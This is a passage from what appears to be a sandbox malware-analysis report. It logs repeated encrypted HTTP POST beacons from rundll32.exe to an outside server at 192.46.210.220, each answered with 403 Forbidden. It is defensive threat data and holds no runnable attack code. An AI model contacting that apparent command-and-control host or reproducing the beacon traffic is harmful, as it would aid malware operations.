64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:56 UTC	108	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:56 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.3	49837	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:58 UTC	108	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:58 UTC	108	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:59 UTC	113	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:59 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.3	49839	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:59 UTC	113	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:59 UTC	113	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:00 UTC	118	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:00 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.3	49845	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:04 UTC	118	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:04 UTC	118	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:05 UTC	128	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:05 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.3	49847	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:04 UTC	123	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:04 UTC	123	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:05 UTC	128	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:05 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.3	49859	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:08 UTC	128	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:08 UTC	128	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:08 UTC	138	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:08 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.3	49860	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:08 UTC	133	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:08 UTC	133	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:09 UTC	138	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:09 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.3	49867	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:12 UTC	138	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:12 UTC	138	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:12 UTC	147	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:12 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.3	49868	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:12 UTC	143	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:12 UTC	143	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:13 UTC	148	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:13 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49757	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:19 UTC	14	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:19 UTC	14	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:20 UTC	19	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:20 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.3	49876	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:16 UTC	148	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:16 UTC	148	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:16 UTC	157	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:16 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.3	49877	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:16 UTC	153	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:16 UTC	153	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:16 UTC	158	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:16 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.3	49884	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:19 UTC	158	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:19 UTC	158	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:20 UTC	167	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:20 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.3	49885	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:20 UTC	162	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:20 UTC	163	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:20 UTC	167	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:20 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.3	49892	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:24 UTC	168	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:24 UTC	168	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:24 UTC	177	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:24 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.3	49893	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:24 UTC	172	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
